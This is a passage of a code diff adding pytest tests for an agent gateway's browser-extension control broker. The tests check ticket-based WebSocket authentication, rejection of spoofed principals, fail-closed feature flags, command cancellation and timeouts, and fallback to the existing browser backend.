= "hermes-browser-control-v1" + + +class _SessionDB: + def __init__(self): + self.sessions = { + "session-fixture": {"id": "session-fixture", "source": "api_server"}, + "remote-session-fixture": { + "id": "remote-session-fixture", + "source": "api_server", + }, + } + + def get_session(self, session_id): + return self.sessions.get(session_id) + + +def _ticket_protocol(ticket): + return f"hermes-browser-control-ticket.{ticket}" + + +def _adapter(*, key=API_KEY): + adapter = APIServerAdapter( + PlatformConfig(enabled=True, extra={"key": key} if key else {}) + ) + adapter._session_db = _SessionDB() + return adapter + + +def _app(adapter): + app = web.Application() + app.router.add_get("/v1/capabilities", adapter._handle_capabilities) + app.router.add_post( + "/v1/browser-control/register", adapter._handle_browser_control_register + ) + app.router.add_get( + "/v1/browser-control/ws", adapter._handle_browser_control_ws + ) + return app + + +def _registration_body(**overrides): + payload = { + "protocol_version": 1, + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "session_id": "session-fixture", + "capabilities": ["controller.noop", "browser_navigate"], + "principal_id": "spoofed-client-principal", + "product": { + "id": "chromium", + "engine": "chromium", + "label": "Chromium browser", + }, + } + payload.update(overrides) + return payload + + +def test_route_table_advertises_registration_and_controller_ws_without_replacing_existing_routes(): + adapter = _adapter() + routes = {(method, path) for method, path, _handler in adapter._http_route_table()} + assert ("POST", "/v1/browser-control/register") in routes + assert ("GET", "/v1/browser-control/ws") in routes + assert ("POST", "/v1/chat/completions") in routes + + +def test_api_agent_context_binds_server_principal_and_transport_family(): + from gateway.session_context import clear_session_vars, get_session_env + + adapter = _adapter() + tokens = adapter._bind_api_server_session( + session_id="session-fixture", + browser_control_principal="principal-fixture", + browser_control_transport_family="local-api", + ) + try: + assert ( + get_session_env("HERMES_BROWSER_CONTROL_PRINCIPAL") + == "principal-fixture" + ) + assert ( + get_session_env("HERMES_BROWSER_CONTROL_TRANSPORT_FAMILY") + == "local-api" + ) + finally: + clear_session_vars(tokens) + + +@pytest.mark.asyncio +async def test_capabilities_are_truthful_and_disabled_by_default(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: False) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.get( + "/v1/capabilities", headers={"Authorization": f"Bearer {API_KEY}"} + ) + assert response.status == 200 + data = await response.json() + + control = data["features"]["browser_extension_control"] + assert control == { + "enabled": False, + "protocol_version": 1, + "capabilities": ["controller.noop"], + "real_browser_actions": False, + "transports": { + "local_vps": "websocket-subprotocol-ticket", + "cloud": "authenticated-gateway-rpc", + }, + } + assert data["endpoints"]["browser_control_register"] == { + "method": "POST", + "path": "/v1/browser-control/register", + } + assert data["endpoints"]["browser_control_ws"] == { + "method": "GET", + "path": "/v1/browser-control/ws", + } + + +@pytest.mark.asyncio +async def test_api_middleware_stamps_server_control_identity_for_agent_entry(): + from gateway.platforms.api_server import ( + _api_request_browser_control_principal, + _api_request_browser_control_transport_family, + ) + + adapter = _adapter() + + async def inspect(_request): + return web.json_response( + { + "principal": _api_request_browser_control_principal.get(), + "transport_family": ( + _api_request_browser_control_transport_family.get() + ), + } + ) + + app = web.Application(middlewares=[adapter._make_profile_prefix_middleware()]) + app.router.add_get("/inspect", inspect) + async with TestClient(TestServer(app)) as client: + response = await client.get("/inspect") + body = await response.json() + + assert body == { + "principal": adapter._derive_browser_control_principal("default"), + "transport_family": "local-api", + } + + +@pytest.mark.asyncio +async def test_registration_requires_enabled_feature_and_configured_bearer_auth(monkeypatch): + disabled = _adapter() + monkeypatch.setattr(disabled, "_browser_control_enabled", lambda: False) + async with TestClient(TestServer(_app(disabled))) as client: + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + assert response.status == 404 + + unkeyed = _adapter(key="") + monkeypatch.setattr(unkeyed, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(unkeyed))) as client: + response = await client.post( + "/v1/browser-control/register", json=_registration_body() + ) + assert response.status == 403 + assert (await response.json())["error"]["code"] == "browser_control_auth_required" + + keyed = _adapter() + monkeypatch.setattr(keyed, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(keyed))) as client: + response = await client.post( + "/v1/browser-control/register", json=_registration_body() + ) + assert response.status == 401 + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(session_id=""), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + assert response.status == 400 + + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(session_id="not-a-server-session"), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + assert response.status == 403 + assert (await response.json())["error"]["code"] == ( + "browser_control_session_forbidden" + ) + + +@pytest.mark.asyncio +async def test_controller_ws_rechecks_feature_flag_before_consuming_ticket(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + ticket = (await response.json())["ticket"] + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: False) + with pytest.raises(WSServerHandshakeError) as disabled: + await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(ticket)], + ) + assert disabled.value.status == 404 + + # Neither a missing protocol nor the legacy query-string shape may + # consume the one-shot credential. + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + with pytest.raises(WSServerHandshakeError) as query_ticket: + await client.ws_connect(f"/v1/browser-control/ws?ticket={ticket}") + assert query_ticket.value.status == 401 + ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(ticket)], + ) + await ws.close() + + +@pytest.mark.asyncio +async def test_local_api_ticket_ws_noop_round_trip_filters_spoofed_identity_and_disabled_actions(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + assert response.status == 201 + registration = await response.json() + assert registration["protocol_version"] == 1 + assert registration["ticket"] + assert registration["ticket_expires_at"] > time.time() + assert 0 < registration["ticket_expires_in_seconds"] <= 30 + assert registration["ws_path"] == "/v1/browser-control/ws" + assert registration["scope"]["principal_id"] != "spoofed-client-principal" + assert registration["scope"]["transport_family"] == "local-api" + assert registration["scope"]["capabilities"] == ["controller.noop"] + + ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(registration["ticket"])], + ) + scope = ControllerScope( + principal_id=registration["scope"]["principal_id"], + profile_id=registration["scope"]["profile_id"], + session_id=registration["scope"]["session_id"], + controller_id=registration["scope"]["controller_id"], + browser_profile_id=registration["scope"]["browser_profile_id"], + transport_family=registration["scope"]["transport_family"], + capabilities=frozenset(registration["scope"]["capabilities"]), + ) + + pending = asyncio.create_task( + asyncio.to_thread( + adapter._browser_control_broker.dispatch, + scope, + action="controller.noop", + arguments={"echo": "local-api"}, + tool_call_id="tool-call-fixture", + ) + ) + command = await ws.receive_json(timeout=2.0) + assert command["method"] == "browser.controller.command" + assert command["params"]["action"] == "controller.noop" + await ws.send_json( + { + "method": "browser.controller.result", + "params": { + "command_id": command["params"]["command_id"], + "ok": True, + "result": {"echo": "local-api"}, + }, + } + ) + assert await asyncio.wait_for(pending, timeout=2.0) == {"echo": "local-api"} + + rejected = asyncio.create_task( + asyncio.to_thread( + adapter._browser_control_broker.dispatch, + scope, + action="controller.noop", + arguments={"echo": "reject"}, + tool_call_id="tool-call-rejected", + ) + ) + rejected_command = await ws.receive_json(timeout=2.0) + await ws.send_json( + { + "method": "browser.controller.result", + "params": { + "command_id": rejected_command["params"]["command_id"], + "ok": "false", + "error": {"code": "controller_rejected", "message": "fixture rejection"}, + }, + } + ) + with pytest.raises(ControllerRejected, match="controller_rejected"): + await asyncio.wait_for(rejected, timeout=2.0) + await ws.close() + + with pytest.raises(WSServerHandshakeError) as replay: + await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(registration["ticket"])], + ) + assert replay.value.status == 401 + + +@pytest.mark.asyncio +async def test_remote_api_uses_the_same_authenticated_noop_round_trip(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + monkeypatch.setattr( + adapter, + "_browser_control_transport_family", + lambda request: "remote-api", + ) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(session_id="remote-session-fixture"), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + registration = await response.json() + assert response.status == 201 + assert registration["scope"]["transport_family"] == "remote-api" + + ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(registration["ticket"])], + ) + scope = ControllerScope( + principal_id=registration["scope"]["principal_id"], + profile_id=registration["scope"]["profile_id"], + session_id=registration["scope"]["session_id"], + controller_id=registration["scope"]["controller_id"], + browser_profile_id=registration["scope"]["browser_profile_id"], + transport_family="remote-api", + capabilities=frozenset(registration["scope"]["capabilities"]), + ) + pending = asyncio.create_task( + asyncio.to_thread( + adapter._browser_control_broker.dispatch, + scope, + action="controller.noop", + arguments={"family": "remote-api"}, + tool_call_id="tool-call-remote", + ) + ) + command = await ws.receive_json(timeout=2.0) + await ws.send_json( + { + "method": "browser.controller.result", + "params": { + "command_id": command["params"]["command_id"], + "ok": True, + "result": {"family": "remote-api"}, + }, + } + ) + assert await asyncio.wait_for(pending, timeout=2.0) == { + "family": "remote-api" + } + await ws.close() diff --git a/tests/gateway/test_browser_control_broker.py b/tests/gateway/test_browser_control_broker.py new file mode 100644 index 0000000000..6f910f87e6 --- /dev/null +++ b/tests/gateway/test_browser_control_broker.py @@ -0,0 +1,159 @@ +import threading +import time + +import pytest + +from gateway.browser_control_broker import ( + BrowserControlBroker, + ControllerCancelled, + ControllerScope, + TicketInvalid, +) + + +def _scope(**overrides): + values = { + "principal_id": "principal-fixture", + "profile_id": "default", + "session_id": "session-fixture", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "transport_family": "local-api", + "capabilities": frozenset({"controller.noop"}), + } + values.update(overrides) + return ControllerScope(**values) + + +def test_registration_ticket_is_short_lived_single_use_and_identity_bound(): + now = [100.0] + broker = BrowserControlBroker(ticket_ttl=30.0, clock=lambda: now[0]) + scope = _scope() + + ticket = broker.mint_ticket(scope) + assert len(ticket.value) >= 32 + assert ticket.expires_at == 130.0 + assert broker.consume_ticket(ticket.value) == scope + with pytest.raises(TicketInvalid, match="unknown|consumed"): + broker.consume_ticket(ticket.value) + + expired = broker.mint_ticket(scope) + now[0] = 131.0 + with pytest.raises(TicketInvalid, match="expired"): + broker.consume_ticket(expired.value) + + +def test_controller_selection_requires_exact_principal_profile_session_controller_and_browser_profile(): + broker = BrowserControlBroker() + scope = _scope() + broker.attach(scope, lambda _frame: None) + + assert broker.select(scope, "controller.noop") is not None + for field, value in ( + ("principal_id", "other-principal"), + ("profile_id", "other-profile"), + ("session_id", "other-session"), + ("controller_id", "other-controller"), + ("browser_profile_id", "other-browser-profile"), + ("transport_family", "remote-api"), + ): + assert broker.select(_scope(**{field: value}), "controller.noop") is None + assert broker.select(scope, "browser_navigate") is None + + +def test_noop_round_trip_uses_controller_and_returns_result_without_enabling_browser_actions(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + + def send(frame): + assert frame["method"] == "browser.controller.command" + assert frame["params"]["action"] == "controller.noop" + broker.complete( + frame["params"]["command_id"], + ok=True, + result={"echo": frame["params"]["arguments"]["echo"]}, + ) + + broker.attach(scope, send) + result = broker.dispatch( + scope, + action="controller.noop", + arguments={"echo": "phase-4"}, + tool_call_id="tool-call-fixture", + ) + assert result == {"echo": "phase-4"} + assert broker.pending_count == 0 + assert broker.select(scope, "browser_navigate") is None + + +def test_cancellation_targets_only_the_matching_pending_command_and_cleans_up(): + broker = BrowserControlBroker(command_timeout=2.0) + scope = _scope() + frames = [] + command_ready = threading.Event() + + def send(frame): + frames.append(frame) + if frame["method"] == "browser.controller.command": + command_ready.set() + + broker.attach(scope, send) + outcome = {} + + def run_dispatch(): + try: + broker.dispatch( + scope, + action="controller.noop", + arguments={}, + tool_call_id="tool-call-cancelled", + ) + except Exception as exc: # asserted below + outcome["error"] = exc + + thread = threading.Thread(target=run_dispatch) + thread.start() + assert command_ready.wait(timeout=1.0) + + assert broker.cancel(scope, tool_call_id="wrong-tool-call") is False + assert broker.cancel(scope, tool_call_id="tool-call-cancelled") is True + thread.join(timeout=1.0) + + assert not thread.is_alive() + assert isinstance(outcome.get("error"), ControllerCancelled) + cancel_frames = [frame for frame in frames if frame["method"] == "browser.controller.cancel"] + assert len(cancel_frames) == 1 + assert cancel_frames[0]["params"]["command_id"] == frames[0]["params"]["command_id"] + assert broker.pending_count == 0 + + +def test_detach_fails_pending_work_closed_and_late_completion_is_ignored(): + broker = BrowserControlBroker(command_timeout=2.0) + scope = _scope() + command_id = [] + command_ready = threading.Event() + + def send(frame): + if frame["method"] == "browser.controller.command": + command_id.append(frame["params"]["command_id"]) + command_ready.set() + + broker.attach(scope, send) + outcome = {} + + def run_dispatch(): + try: + broker.dispatch(scope, action="controller.noop", arguments={}) + except Exception as exc: # asserted below + outcome["error"] = exc + + thread = threading.Thread(target=run_dispatch) + thread.start() + assert command_ready.wait(timeout=1.0) + broker.detach(scope) + thread.join(timeout=1.0) + + assert not thread.is_alive() + assert isinstance(outcome.get("error"), ControllerCancelled) + assert broker.complete(command_id[0], ok=True, result={}) is False + assert broker.pending_count == 0 diff --git a/tests/gateway/test_browser_control_broker_hardening.py b/tests/gateway/test_browser_control_broker_hardening.py new file mode 100644 index 0000000000..b78aec407b --- /dev/null +++ b/tests/gateway/test_browser_control_broker_hardening.py @@ -0,0 +1,331 @@ +import threading + +import pytest + +from gateway.browser_control_broker import ( + BrowserControlBroker, + browser_control_enabled, + ControllerCancelled, + ControllerScope, + ControllerRejected, + ControllerTimeout, + ControllerUnavailable, +) + + +def _scope(**overrides): + values = { + "principal_id": "principal-fixture", + "profile_id": "default", + "session_id": "session-fixture", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "transport_family": "local-api", + "capabilities": frozenset({"controller.noop"}), + } + values.update(overrides) + return ControllerScope(**values) + + +def _start_pending(broker, scope, *, tool_call_id="tool-call-fixture"): + outcome = {} + ready = threading.Event() + frames = [] + + def send(frame): + frames.append(frame) + if frame["method"] == "browser.controller.command": + ready.set() + + broker.attach(scope, send, owner="owner-fixture") + + def run(): + try: + outcome["result"] = broker.dispatch( + scope, + action="controller.noop", + arguments={}, + tool_call_id=tool_call_id, + ) + except Exception as exc: + outcome["error"] = exc + + thread = threading.Thread(target=run) + thread.start() + assert ready.wait(timeout=1.0) + return thread, outcome, frames + + +def test_detach_emits_cancel_before_controller_is_removed(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + thread, outcome, frames = _start_pending(broker, scope) + + broker.detach(scope) + thread.join(timeout=1.0) + + assert isinstance(outcome.get("error"), ControllerCancelled) + assert [frame["method"] for frame in frames] == [ + "browser.controller.command", + "browser.controller.cancel", + ] + + +def test_dispatch_revalidates_selected_controller_after_detach_race(): + broker = BrowserControlBroker(command_timeout=0.2) + scope = _scope() + broker.attach(scope, lambda _frame: None) + selected = threading.Event() + resume = threading.Event() + original_select = broker.select + + def paused_select(candidate_scope, capability): + controller = original_select(candidate_scope, capability) + selected.set() + assert resume.wait(timeout=1.0) + return controller + + broker.select = paused_select + outcome = {} + + def run(): + try: + broker.dispatch(scope, action="controller.noop", arguments={}) + except Exception as exc: + outcome["error"] = exc + + thread = threading.Thread(target=run) + thread.start() + assert selected.wait(timeout=1.0) + broker.detach(scope) + resume.set() + thread.join(timeout=1.0) + + assert not thread.is_alive() + assert isinstance(outcome.get("error"), ControllerUnavailable) + assert broker.pending_count == 0 + + +def test_completion_requires_the_same_scope_as_the_pending_command(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + thread, outcome, frames = _start_pending(broker, scope) + command_id = frames[0]["params"]["command_id"] + + assert broker.complete( + command_id, + scope=_scope(principal_id="other-principal"), + ok=True, + result={"unsafe": True}, + ) is False + assert thread.is_alive() + assert broker.complete( + command_id, + scope=scope, + ok=True, + result={"safe": True}, + ) is True + thread.join(timeout=1.0) + + assert outcome.get("result") == {"safe": True} + assert broker.pending_count == 0 + + +def test_reattach_cancels_pending_work_from_the_previous_controller_generation(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + thread, outcome, frames = _start_pending(broker, scope) + old_command_id = frames[0]["params"]["command_id"] + + broker.attach(scope, lambda _frame: None, owner="replacement-owner") + thread.join(timeout=1.0) + + assert not thread.is_alive() + assert isinstance(outcome.get("error"), ControllerCancelled) + assert broker.complete(old_command_id, scope=scope, ok=True, result={}) is False + + +def test_session_lookup_fails_closed_on_ambiguity_and_owner_detach_is_scoped(): + broker = BrowserControlBroker() + first = _scope(controller_id="controller-one") + second = _scope(controller_id="controller-two") + other = _scope( + session_id="other-session", + controller_id="controller-other", + transport_family="cloud-ticket-ws", + ) + broker.attach(first, lambda _frame: None, owner="owner-shared") + broker.attach(second, lambda _frame: None, owner="owner-shared") + broker.attach(other, lambda _frame: None, owner="owner-other") + + assert broker.scope_for_session( + session_id="session-fixture", + principal_id="principal-fixture", + transport_family="local-api", + ) is None + assert broker.scope_for_session( + session_id="other-session", + principal_id="principal-fixture", + transport_family="cloud-ticket-ws", + ) == other + + assert broker.detach_owner("owner-shared") == 2 + assert broker.scope_for_session( + session_id="other-session", + principal_id="principal-fixture", + transport_family="cloud-ticket-ws", + ) == other + assert broker.detach_owner("missing-owner") == 0 + + broker.reset() + assert broker.scope_for_session( + session_id="other-session", + principal_id="principal-fixture", + transport_family="cloud-ticket-ws", + ) is None + assert broker.pending_count == 0 + + +def test_session_lookup_requires_exact_server_principal_and_transport_family(): + broker = BrowserControlBroker() + local = _scope( + principal_id="principal:api:local", + controller_id="controller-local", + transport_family="local-api", + ) + remote = _scope( + principal_id="principal:api:remote", + controller_id="controller-remote", + transport_family="remote-api", + ) + broker.attach(local, lambda _frame: None, owner="owner-local") + broker.attach(remote, lambda _frame: None, owner="owner-remote") + + assert broker.scope_for_session(session_id="session-fixture") is None + assert broker.scope_for_session( + session_id="session-fixture", + principal_id="principal:api:local", + transport_family="local-api", + ) == local + assert broker.scope_for_session( + session_id="session-fixture", + principal_id="principal:api:local", + transport_family="remote-api", + ) is None + assert broker.scope_for_session( + session_id="session-fixture", + principal_id="principal:api:attacker", + transport_family="local-api", + ) is None + + +def test_feature_flag_requires_literal_boolean_true(): + assert browser_control_enabled({}) is False + assert browser_control_enabled( + {"browser": {"extension_control": {"enabled": False}}} + ) is False + assert browser_control_enabled( + {"browser": {"extension_control": {"enabled": True}}} + ) is True + for ambiguous in ("true", "false", "yes", 1, [], {}): + assert browser_control_enabled( + {"browser": {"extension_control": {"enabled": ambiguous}}} + ) is False + + +def test_transport_teardown_can_cancel_waiters_without_writing_to_closing_peer(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + thread, outcome, frames = _start_pending(broker, scope) + + assert broker.detach_owner("owner-fixture", notify_controller=False) == 1 + thread.join(timeout=1.0) + + assert isinstance(outcome.get("error"), ControllerCancelled) + assert [frame["method"] for frame in frames] == ["browser.controller.command"] + assert broker.pending_count == 0 + + +def test_stale_owner_teardown_cannot_detach_replacement_controller_generation(): + broker = BrowserControlBroker() + scope = _scope() + first_owner = object() + live_owner = object() + broker.attach(scope, lambda frame: None, owner=first_owner) + broker.attach(scope, lambda frame: None, owner=live_owner) + + broker.detach( + scope, + owner=first_owner, + notify_controller=False, + ) + + selected = broker.select(scope, "controller.noop") + assert selected is not None + assert selected.owner is live_owner + + +def test_completion_winning_at_timeout_boundary_is_not_misreported_as_timeout(): + broker = BrowserControlBroker(command_timeout=0.01) + scope = _scope() + + class BoundaryEvent: + def set(self): + pass + + def wait(self, timeout): + assert broker.complete( + command_id, + scope=scope, + ok=True, + result={"boundary": "completed"}, + ) + return False + + def send(frame): + nonlocal command_id + command_id = frame["params"]["command_id"] + broker._pending[command_id].event = BoundaryEvent() + + command_id = "" + broker.attach(scope, send) + assert broker.dispatch(scope, action="controller.noop") == { + "boundary": "completed" + } + + +def test_timeout_marks_terminal_and_emits_cancel_to_controller(): + broker = BrowserControlBroker(command_timeout=0.01) + scope = _scope() + frames = [] + broker.attach(scope, frames.append) + + with pytest.raises(ControllerTimeout): + broker.dispatch( + scope, + action="controller.noop", + tool_call_id="tool-timeout", + ) + + assert [frame["method"] for frame in frames] == [ + "browser.controller.command", + "browser.controller.cancel", + ] + assert broker.pending_count == 0 + + +def test_non_boolean_success_values_fail_closed(): + broker = BrowserControlBroker(command_timeout=1.0) + scope = _scope() + + def send(frame): + assert broker.complete( + frame["params"]["command_id"], + scope=scope, + ok="false", + result={"spoofed": True}, + ) + + broker.attach(scope, send) + with pytest.raises(ControllerRejected): + broker.dispatch(scope, action="controller.noop") diff --git a/tests/gateway/test_browser_control_cloud.py b/tests/gateway/test_browser_control_cloud.py new file mode 100644 index 0000000000..0d40941045 --- /dev/null +++ b/tests/gateway/test_browser_control_cloud.py @@ -0,0 +1,294 @@ +import threading +from types import SimpleNamespace + +import pytest + +from gateway.browser_control_broker import ControllerRejected, get_browser_control_broker +from hermes_cli import web_server +from hermes_cli.dashboard_auth.ws_tickets import _reset_for_tests, mint_ticket +from tui_gateway import server +from tui_gateway.ws import WSTransport +from tui_gateway.methods_browser_control import _broker_event_writer, _principal_digest + + +def _fake_ticket_ws(ticket): + return SimpleNamespace( + query_params={"ticket": ticket}, + client=SimpleNamespace(host="203.0.113.7"), + url=SimpleNamespace(path="/api/ws"), + ) + + +@pytest.fixture +def gated_dashboard(): + previous = getattr(web_server.app.state, "auth_required", False) + web_server.app.state.auth_required = True + try: + yield + finally: + web_server.app.state.auth_required = previous + _reset_for_tests() + + +def test_dashboard_ticket_identity_is_carried_forward_without_trusting_rpc_params(gated_dashboard): + _reset_for_tests() + ticket = mint_ticket(user_id="user-fixture", provider="provider-fixture") + ws = _fake_ticket_ws(ticket) + + assert web_server._ws_auth_ok(ws) is True + assert ws._hermes_auth_identity == { + "user_id": "user-fixture", + "provider": "provider-fixture", + } + assert web_server._ws_auth_ok(_fake_ticket_ws(ticket)) is False + + +def test_ws_transport_records_only_server_authenticated_identity(): + loop = SimpleNamespace() + identity = {"user_id": "user-fixture", "provider": "provider-fixture"} + transport = WSTransport( + SimpleNamespace(), + loop, + peer="identity-test", + auth_identity=identity, + ) + assert transport.auth_identity == identity + + +def test_cloud_agent_context_binds_registration_principal_and_transport_family(): + from gateway.session_context import clear_session_vars, get_session_env + + identity = {"user_id": "user-fixture", "provider": "provider-fixture"} + transport = SimpleNamespace(auth_identity=identity) + server._sessions["context-session-fixture"] = { + "transport": transport, + "session_key": "stored-context-session", + "profile": "default", + "agent": SimpleNamespace(session_id="context-session-fixture"), + } + tokens = [] + try: + tokens = server._set_session_context("stored-context-session") + assert get_session_env("HERMES_BROWSER_CONTROL_PRINCIPAL") == _principal_digest( + identity + ) + assert ( + get_session_env("HERMES_BROWSER_CONTROL_TRANSPORT_FAMILY") + == "cloud-ticket-ws" + ) + finally: + clear_session_vars(tokens) + server._sessions.pop("context-session-fixture", None) + + +def test_cloud_event_writer_surfaces_closed_or_failed_transport_immediately(): + class RaisingTransport: + def write(self, _frame): + raise ConnectionError("fixture transport closed") + + class FalseTransport: + def write(self, _frame): + return False + + frame = {"method": "browser.controller.command", "params": {"command_id": "fixture"}} + with pytest.raises(ConnectionError, match="fixture transport closed"): + _broker_event_writer(RaisingTransport(), "session-fixture")(frame) + with pytest.raises(ConnectionError, match="failed"): + _broker_event_writer(FalseTransport(), "session-fixture")(frame) + + +def test_cloud_principal_digest_is_unambiguous_across_identity_components(): + assert _principal_digest({"user_id": "a:b", "provider": "c"}) != _principal_digest( + {"user_id": "a", "provider": "b:c"} + ) + + +@pytest.mark.parametrize( + "identity", + [None, {}, {"user_id": "server-internal", "provider": "server-internal"}], +) +def test_cloud_controller_registration_rejects_missing_or_internal_identity(monkeypatch, identity): + monkeypatch.setattr( + "gateway.browser_control_broker.browser_control_enabled", lambda: True + ) + + class Transport: + auth_identity = identity + + def write(self, _frame): + return True + + transport = Transport() + server._sessions["session-fixture"] = { + "transport": transport, + "session_key": "stored-session-fixture", + "profile": "default", + } + try: + response = server.dispatch( + { + "jsonrpc": "2.0", + "id": 1, + "method": "browser.controller.register", + "params": { + "session_id": "session-fixture", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "capabilities": ["controller.noop"], + "principal_id": "spoofed-client-principal", + }, + }, + transport, + ) + assert response["error"]["code"] == 4403 + finally: + server._sessions.pop("session-fixture", None) + + +def test_cloud_gateway_noop_round_trip_is_bound_to_ticket_identity_and_session_transport(monkeypatch): + monkeypatch.setattr( + "gateway.browser_control_broker.browser_control_enabled", lambda: True + ) + broker = get_browser_control_broker() + broker.reset() + frames = [] + ready = threading.Event() + + class Transport: + auth_identity = { + "user_id": "user-fixture", + "provider": "provider-fixture", + } + + def write(self, frame): + frames.append(frame) + if frame.get("method") == "event": + ready.set() + return True + + transport = Transport() + server._sessions["session-fixture"] = { + "transport": transport, + "session_key": "stored-session-fixture", + "profile": "default", + } + try: + registration = server.dispatch( + { + "jsonrpc": "2.0", + "id": 1, + "method": "browser.controller.register", + "params": { + "protocol_version": 1, + "session_id": "session-fixture", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + "capabilities": ["controller.noop", "browser_navigate"], + "principal_id": "spoofed-client-principal", + }, + }, + transport, + ) + scope_payload = registration["result"]["scope"] + assert scope_payload["principal_id"] != "spoofed-client-principal" + assert scope_payload["transport_family"] == "cloud-ticket-ws" + assert scope_payload["capabilities"] == ["controller.noop"] + + missing_identity = server.dispatch( + { + "jsonrpc": "2.0", + "id": 41, + "method": "browser.controller.register", + "params": { + "session_id": "session-fixture", + "controller_id": "", + "browser_profile_id": "", + "capabilities": ["controller.noop"], + }, + }, + transport=transport, + ) + assert missing_identity["error"]["code"] == 4403 + + scope = broker.scope_for_session( + session_id="session-fixture", + principal_id=scope_payload["principal_id"], + transport_family="cloud-ticket-ws", + ) + assert scope is not None + outcome = {} + + def dispatch_noop(): + outcome["result"] = broker.dispatch( + scope, + action="controller.noop", + arguments={"echo": "cloud"}, + tool_call_id="tool-call-cloud", + ) + + thread = threading.Thread(target=dispatch_noop) + thread.start() + assert ready.wait(timeout=1.0) + command_event = frames[-1] + assert command_event["method"] == "event" + assert command_event["params"]["type"] == "browser.controller.command" + command_id = command_event["params"]["payload"]["command_id"] + + result_response = server.dispatch( + { + "jsonrpc": "2.0", + "id": 2, + "method": "browser.controller.result", + "params": { + "session_id": "session-fixture", + "command_id": command_id, + "ok": True, + "result": {"echo": "cloud"}, + }, + }, + transport, + ) + assert result_response["result"]["accepted"] is True + thread.join(timeout=1.0) + assert outcome["result"] == {"echo": "cloud"} + + rejected_outcome = {} + ready.clear() + + def dispatch_rejected(): + try: + rejected_outcome["result"] = broker.dispatch( + scope, + action="controller.noop", + arguments={"echo": "reject"}, + tool_call_id="tool-call-cloud-rejected", + ) + except Exception as exc: # asserted below + rejected_outcome["error"] = exc + + rejected_thread = threading.Thread(target=dispatch_rejected, daemon=True) + rejected_thread.start() + assert ready.wait(timeout=1.0) + rejected_event = frames[-1] + rejected_response = server.dispatch( + { + "jsonrpc": "2.0", + "id": 8, + "method": "browser.controller.result", + "params": { + "session_id": "session-fixture", + "command_id": rejected_event["params"]["payload"]["command_id"], + "ok": "false", + "error": {"code": "controller_rejected", "message": "fixture rejection"}, + }, + }, + transport=transport, + ) + assert rejected_response["result"]["accepted"] is True + rejected_thread.join(timeout=1.0) + assert isinstance(rejected_outcome.get("error"), ControllerRejected) + assert "controller_rejected" in str(rejected_outcome["error"]) + assert broker.pending_count == 0 + finally: + broker.reset() + server._sessions.pop("session-fixture", None) diff --git a/tests/tools/test_browser_extension_router.py b/tests/tools/test_browser_extension_router.py new file mode 100644 index 0000000000..66dcf4ea3e --- /dev/null +++ b/tests/tools/test_browser_extension_router.py @@ -0,0 +1,198 @@ +import pytest + +from tools.browser_extension_router import route_browser_tool, routed_browser_handler + + +class FakeBroker: + def __init__(self, *, scope=None, selected=None, result=None, error=None): + self.scope = scope + self.selected = selected + self.result = result + self.error = error + self.calls = [] + + def scope_for_session(self, **identity): + self.calls.append(("scope", identity)) + return self.scope + + def select(self, scope, action): + self.calls.append(("select", scope, action)) + return self.selected + + def dispatch(self, scope, *, action, arguments, tool_call_id=""): + self.calls.append(("dispatch", scope, action, arguments, tool_call_id)) + if self.error: + raise self.error + return self.result + + +def test_feature_off_calls_existing_backend_once_without_touching_broker(): + broker = FakeBroker() + fallbacks = [] + args = {"url": "https://example.test"} + + result = route_browser_tool( + "browser_navigate", + args, + fallback=lambda: fallbacks.append(args.copy()) or "legacy-result", + broker=broker, + enabled=False, + session_id="session-fixture", + task_id="task-fixture", + tool_call_id="tool-call-fixture", + ) + + assert result == "legacy-result" + assert fallbacks == [{"url": "https://example.test"}] + assert broker.calls == [] + + +@pytest.mark.parametrize( + "scope,selected", + [(None, None), ("scope-fixture", None)], +) +def test_no_exact_capable_controller_preserves_existing_backend(scope, selected): + broker = FakeBroker(scope=scope, selected=selected) + fallbacks = [] + + result = route_browser_tool( + "browser_navigate", + {"url": "https://example.test"}, + fallback=lambda: fallbacks.append(True) or "legacy-result", + broker=broker, + 